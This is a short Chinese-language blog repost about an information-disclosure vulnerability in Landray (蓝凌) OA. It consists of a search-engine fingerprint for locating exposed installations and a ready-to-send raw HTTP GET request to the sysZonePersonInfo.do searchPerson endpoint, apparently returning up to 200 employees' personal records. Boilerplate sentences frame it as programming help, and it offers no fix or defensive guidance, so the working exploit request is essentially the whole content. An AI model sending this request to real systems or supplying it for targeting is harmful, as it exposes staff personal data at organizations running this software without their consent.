蓝凌OA 信息泄露

本文主要是介绍蓝凌OA 信息泄露，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

指纹特征

app="Landray-OA系统"

漏洞复现

GET /sys/zone/sys_zone_personInfo/sysZonePersonInfo.do?.js?&method=searchPerson&orderby&ordertype=up&rowsize=200&s_ajax=true HTTP/1.1
Host: xxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=F7FF497303B2F4CD39FC43E5EDB2D015
Connection: close

这篇关于蓝凌OA 信息泄露的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---